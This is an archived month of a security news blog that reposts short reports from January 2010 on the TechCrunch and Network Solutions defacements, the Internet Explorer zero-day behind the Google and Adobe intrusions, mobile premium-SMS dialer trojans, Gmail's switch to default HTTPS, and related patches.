Monthly Archives: January 2010

TechCrunch compromised, defaced

0
Posted by Tech Paranoia on January 26, 2010 – 11:00 am
Filed under Hacks
Tagged as ,

Popular technology site TechCrunch was hit by potty-mouth hackers late on Monday, leaving the site temporarily unavailable.

A notice on TechCrunch.com’s front page on Tuesday morning explains that “TechCrunch.com was compromised by a security exploit”. Access to the site’s story archive has been suspended leaving a two para notice on the hack as the only content visible on the site.

Hackers defaced the front page of the site with a message (recorded by Mikko Hypponen of F-Secure here) apparently abusing site admins and including a link to a pornographic content and warez linking website.

This defacement was removed by site admins who are in the process of identifying the exploit involved in the hack, securing systems, and bringing TechCrunch back online.

The motives or perpetrators of the attack remain unclear but the timing – a day before Apple’s much anticipated iTab launch in San Francisco – could hardly be worse.

Source: The Register

Hundreds of Network Solutions Sites Hacked

0
Posted by Tech Paranoia on January 20, 2010 – 8:36 am
Filed under Hacks
Tagged as

netsoldeface

Web site domain registrar and hosting provider Network Solutions acknowledged Tuesday that hackers had broken into its servers and defaced hundreds of customer Web sites.

The hackers appear to have replaced each site’s home page with anti-Israeli sentiments and pictures of masked militants and armed with rocket launchers and rifles, along with the message “HaCKed by CWkomando.”

According to results for that search term entered into Microsoft’s Bing search engine, there may in fact be thousands of sites affected by this mass defacement.

One of the defaced pages belonged to Minnesota’s 8th District GOP, according to a story in The Minnesota Independent, which said the Arabic writing that accompanies the defaced pages contains the dedication “For Palestine,” and the repeated phrase “Allahu Akbar” [God is great].

Network Solutions said the hackers were able to get in by exploiting a “file-inclusion” weakness in the company’s Unix servers. So-called remote file inclusion attacks are quite common, and can let attackers insert code that gives them backdoor access to and control over the affected server. Network Solutions said it is in the process of helping customers restore their sites.

“These incidents are regrettable and we apologize for the inconvenience,” the company said in its statement. “Due to the nature of the web, the race between technology and the bad elements is a challenge that companies face continually.”

Network Solutions said there was no danger to customers’ “personally identifiable or secure information” as a result of the incident. Other recent break-ins at NetSol have not been so benign: Last summer, hackers broke into a number of Network Solutions Web servers and planted rogue code that resulted in the compromise of more than 573,000 debit and credit card accounts.

Source: Krebson Security

Microsoft: Emergency IE Patch Coming

0
Posted by Tech Paranoia on January 19, 2010 – 9:02 am
Filed under Patches, exploit
Tagged as , , , , ,

Microsoft has started dropping broad hints that an emergency patch for Internet Explorer will be released very soon to counter targeted attacks and the publication of exploit code for a “browse and you’re owned” vulnerability in its flagship Web browser.

The out-of-band update will be released once the company is satisfied that it has been properly tested against all affected versions of Windows. This could happen as early as this weekend.

The decision to ship the IE patch outside of Microsoft’s scheduled Patch Tuesday releases follows the release of exploit code into the Metasploit attack tool.

The Metasploit code only works against Internet Explorer 6 but there are claims in the security research community that the vulnerability has been successfully exploited on IE7 (Windows Vista) as well as IE6 and on Windows XP.

The vulnerability was discovered during zero-day attacks against several big-name U.S. companies, including Google, Adobe and Juniper Networks. During those attacks, data-stealing malware exploited the flaw against systems running IE6 on Windows XP.

Microsoft says the ongoing attacks remain “targeted to a very limited number of corporations” and are only effective against Internet Explorer 6. However, with the exploit code now in Metasploit, malware purveyors could begin tinkering with exploits geared to newer versions of the browser.

Now, Microsoft is imploring its customers to upgrade immediately to IE 8. A special guidance page has been published to offer information on how to mitigate this vulnerability and avoid attacks.

Microsoft’s Security Research & Defense team has created and released a one-click “Fix It” tool to allow users to enable DEP (Data Execution Prevention) on older versions of the browser. DEP, a crucial anti-exploit mitigation, is enabled by default on IE8 only.

Source: ThreatPost

Hack of Adobe Conducted Via Zero-Day IE Flaw

0
Posted by Tech Paranoia on January 14, 2010 – 2:22 pm
Filed under Hacks, Zero Day, exploit
Tagged as , , , , ,

The recent hack attack on Adobe occurred through exploitation of a zero-day vulnerability that affects all versions of Internet Explorer, according to a security researcher with a leading anti-virus firm.

Microsoft learned about the vulnerability only Wednesday evening and is planning to release an announcement about the vulnerability later today, said the researcher, who asked not to be identified because he’s not authorized to speak with the press.

The vulnerability, for which there is currently no patch, is a memory corruption flaw that causes the browser to internally misfire in a way that allows the hacker to inject malware on the user’s computer.

“It’s pretty targeted so the reality is that it’s only currently being used against these targeted companies,” the researcher said. He couldn’t say how many of the other 33 companies hit in the hack attack were breached in this way.

Zero day vulnerabilities are security flaws in software for which there is currently no patch. Researchers discovered a memory corruption flaw in IE in December, which Microsoft patched on Dec. 9. The researcher, however, said the one that affected Adobe is believed to be a new and different one.

Google announced on Tuesday that it had been the target of a “highly sophisticated” and coordinated hack attack against its corporate network, and that the hackers had stolen intellectual property and sought access to the Gmail accounts of human rights activists.

Minutes later, Adobe acknowledged in a blog post that it discovered Jan. 2 that it had been the target of a “sophisticated, coordinated attack against corporate network systems managed by Adobe and other companies.”

Neither Google nor Adobe provided details about how the hacks occurred.

Full article at: Threat Level

Trojan pr0n dialers make comeback on mobile phones

0
Posted by Tech Paranoia on January 14, 2010 – 11:00 am
Filed under Malware, Viruses
Tagged as ,

After taking a long hiatus, trojan dialers that can rack up thousands of dollars in charges are back by popular demand.

According to researchers at CA Security’s malware analysis lab, a new wave of malicious dialers is hitting users of mobile phones. The trojans are built on the Java 2 Micro Edition programming language and cause infected handsets to send SMS messages to high-cost numbers, at great expense to the victim.

“As soon as the application is loaded, this malicious software starts to send premium text messages,” CA warned on Tuesday. “The messages sent out are in the typical format to invoke premium services and land the mobile user with heavy mobile bills without the user’s knowledge and consent.”

Malware that automatically dials pricey premium numbers was all the rage a decade ago, when dial-up internet services required computers to connect to a phone line. With the growth of broadband connections the frequency of dialers waned.

The explosion of smart phone that can run software made by anyone has given malicious dialers a new lease on life. And as was the case in the days of yore, they mostly tap into porn services.

Source: The Register

GMail Goes “https-only” By Default

0
Posted by Tech Paranoia on January 14, 2010 – 9:30 am
Filed under Security
Tagged as , ,

A day after confirming a major security breach by Chinese hackers looking for GMail account information, Google has turned on default “https:” access for its popular Web mail service.

Google had previously added the option for GMail users to “always use https” back in July 2008 but it was turned off by default.

Last June, a group of researchers and academics released an open-letter calling on Google protect users’ communications from theft and snooping by enabling industry standard transport encryption technology (HTTPS) for Google Mail, Docs, and Calendar.

Now comes word that this is indeed happening:

“We are currently rolling out default https for everyone. If you’ve previously set your own https preference from Gmail Settings, nothing will change for your account. If you trust the security of your network and don’t want default https turned on for performance reasons, you can turn it off at any time by choosing “Don’t always use https” from the Settings menu. Gmail will still always encrypt the login page to protect your password. Google Apps users whose admins have not already defaulted their entire domains to https will have the same option.”

Source: ThreatPost

Twitter plans new products and tighter security

0
Posted by Tech Paranoia on January 13, 2010 – 2:00 pm
Filed under Security
Tagged as , ,

Twitter has announced plans to hire 27 professionals to create new products and improve the security of the site.

The increase in headcount is a significant move for the relatively small company, which currently has around 120 staff.

Advertisement

Twitter co-founder Biz Stone stated in November that 2010 will be the “revenue year” for the company, and the variety of job postings currently hosted on the micro-blogging site suggests that he is not digressing from this strategy.

The new employees will focus on creating Twitter front-end features, and should have experience in advertising applications in line with firm’s new advertising strategy scheduled to be rolled out this year.

Twitter is also issuing calls for a professional who will maintain a platform to help developers in media companies create new integrations with Twitter, as well as for another employee who will encourage media professionals to use the tools.

The other job descriptions display Twitter’s plans to increase the support tools available to users, further develop its application programming interface, develop Twitter’s international front-end and add new search capabilities.

A product marketing manager is also wanted to enhance business users’ understanding of the value of Twitter. According to the description, the work can range from creating “better packaging [of] existing features for businesses, managing all outbound marketing for new monetisation products, [and] analysing customer needs for improved product development”.

Finally, Twitter wants to increase its security team after a number of safety issues hit the headlines last year. The most recent incident involved hackers logging in to Twitter and redirecting users to a site hosted by a group calling itself the ‘Iranian Cyber Army’.

A network and infrastructure security manager will audit and secure systems and create procedures that respond to security issues. The job will involve designing a system that will prevent network intrusions. Meanwhile, an anti-spam software engineer will focus on Twitter’s spam detection system.

Source: v3.co.uk

Cybercriminals target school districts

1
Posted by Tech Paranoia on January 13, 2010 – 1:00 pm
Filed under Hacks
Tagged as

Local school districts across the United States have emerged as a prime target for cybercriminals. In the fall of 2009, districts in Colorado, Illinois, Oklahoma and Pennsylvania all reported thefts of tens of thousands of dollars.

The threat continues: on January 5, 2010, the Duanesburg, New York Central School District disclosed an attempted theft of $3.8 million, about a quarter of the district’s operating budget.

These crimes have been driven by malicious software infecting central office PC’s containing the district’s electronic banking details. These details were subsequently used by cybercriminals to access the district’s online bank account and illegally transfer money out of the account to money-mules, who subsequently transfer the funds to the criminal ringleaders.

Comodo CEO Melih Abdulhayoglu points out the soft-target characteristics of school districts and similar organizations including local governments, not-for-profit-organizations, and small businesses that make them attractive to cybercriminals. Abdulhayoglu further points out the need for much stronger “Default Deny” PC endpoint security to be deployed by organizations that will always appear to be soft targets relative to larger organizations with the personnel and financial resources to mount stronger cyber-defenses.

Source: Help Net Security

Adobe releases patch for critical Acrobat and Reader flaw

0
Posted by Tech Paranoia on January 13, 2010 – 12:00 pm
Filed under Patches, Software
Tagged as , ,

Adobe has released a patch for multiple vulnerabilities in its Acrobat and Reader products. This patch addresses the widely used exploit that was released into the wild last month. Exploiting these vulnerabilities may allow an attacker to execute code or perform a denial of service attack.

Adobe Security Bulletin

Google announces data breach, will stop censoring in China (if they stay at all)

0
Posted by Tech Paranoia on January 13, 2010 – 11:00 am
Filed under Hacks
Tagged as , ,

The big news today regarding Google is its announcement on its blog that it was a target of a highly focused attack on its corporate infrastructure.

Googles statement:

“First, this attack was not just on Google. As part of our investigation we have discovered that at least twenty other large companies from a wide range of businesses–including the Internet, finance, technology, media and chemical sectors–have been similarly targeted. We are currently in the process of notifying those companies, and we are also working with the relevant U.S. authorities.

Second, we have evidence to suggest that a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists. Based on our investigation to date we believe their attack did not achieve that objective. Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Third, as part of this investigation but independent of the attack on Google, we have discovered that the accounts of dozens of U.S.-, China- and Europe-based Gmail users who are advocates of human rights in China appear to have been routinely accessed by third parties. These accounts have not been accessed through any security breach at Google, but most likely via phishing scams or malware placed on the users’ computers.”

Google has announced that it will stop filtering search results in China. This is a bold move for Google, and a reversal of past practices. Google has come under fire from freedom advocates in recent years due to its cooperation with the Chinese government in censoring search results for users in China.

This move indicates that Google possibly considers the attacks to have been authorized by the Chinese government, or that they were performed by government sympathizers.

Additionally, Google has announced that if conditions in China continue to be non-conducive to business, it will consider pulling out of China completely.